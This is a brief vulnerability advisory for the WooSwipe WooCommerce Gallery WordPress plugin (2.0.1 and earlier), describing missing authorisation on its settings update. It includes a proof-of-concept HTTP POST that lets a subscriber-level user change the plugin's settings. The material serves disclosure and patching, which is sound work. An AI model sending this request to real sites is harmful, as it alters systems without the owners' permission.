WooSwipe WooCommerce Gallery <= 2.0.1 - Subscriber+ Settings Update

The plugin does not have any authorisation when updating its settings, which could allow any authenticated users, such as subscriber to update them

PoC

POST /wp-admin/admin.php?page=wooswipe-options HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------1848431393440185984976916911 Content-Length: 565 Connection: close Cookie: [subscriber+] Upgrade-Insecure-Requests: 1 -----------------------------1848431393440185984976916911 Content-Disposition: form-data; name=“white_theme” checkbox -----------------------------1848431393440185984976916911 Content-Disposition: form-data; name=“icon_bg_color” #000000 -----------------------------1848431393440185984976916911 Content-Disposition: form-data; name=“icon_stroke_color” #ffffff -----------------------------1848431393440185984976916911 Content-Disposition: form-data; name=“wooswipe_save” Save Changes -----------------------------1848431393440185984976916911-- Even though the response will be a 403, the settings will be updated